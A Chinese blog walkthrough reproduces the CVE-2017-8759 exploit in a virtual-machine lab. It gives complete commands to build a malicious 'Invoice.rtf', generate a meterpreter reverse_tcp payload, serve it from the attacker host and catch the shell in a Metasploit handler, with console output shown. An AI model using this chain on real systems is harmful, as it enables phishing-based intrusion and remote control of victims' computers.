CVE-2017-8759漏洞复现

漏洞介绍:http://www.freebuf.com/articles/system/147602.html

贴上POC地址:https://github.com/bhdresh/CVE-2017-8759

由于kali2.0太卡,已被我抛弃,目前使用parrot系统。

先用命令将POC下载到本地

git clone https://github.com/bhdresh/CVE-2017-8759

CVE-2017-8759漏洞复现

我们进入到CVE-2017-8759这个文件夹,打开README.md文件查看下使用方法

sudo pluma README.md

CVE-2017-8759漏洞复现

###### Example commands
	1) Generate malicious RTF file
	   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
	2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
	   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
	   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
	3) Start toolkit in exploit mode to deliver local payload
	   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

我们先用命令python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.0.124/test.txt生成一个恶意的RTF文件(先用ifconfig命令查看下自己的IP,将里面的IP修改为自己的IP,我这里是192.168.0.124)

CVE-2017-8759漏洞复现

可以看到生成成功了,我们ls看下是否有这个文件

CVE-2017-8759漏洞复现

然后第二步,用msf生成Payload。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f exe > /tmp/shell.exe

CVE-2017-8759漏洞复现

然后用msfconsole启动msf,需要等待些时间。

等启动好后我们配置下msf

msf > use exploit/multi/handler 
msf exploit(handler) > set payload set payload windows/meterpreter/reverse_tcp
[-] The value specified for payload is not valid.
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set lhost 192.168.0.124
lhost => 192.168.0.124
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.124    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.0.124:4444

CVE-2017-8759漏洞复现

CVE-2017-8759漏洞复现

监听成功,我们进行最后一步

python cve-2017-8759_toolkit.py -M exp -e http://192.168.0.124/shell.exe -l /tmp/shell.exe

CVE-2017-8759漏洞复现

我们把rtf文件拖动到win7虚拟机下打开

CVE-2017-8759漏洞复现

可以看到有反弹回来的信息了,不过貌似这系统的msf有问题,卡在那了

CVE-2017-8759漏洞复现

我们按ctrl+c停止,再session -l查看下会话列表

session -i选择会话

CVE-2017-8759漏洞复现

成功,接下来怎么玩,我相信各位大佬比我清楚。

有POC就是牛逼。


本文作者: iceH
本文链接: http://www.secice.cn/p/c1a00b05
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!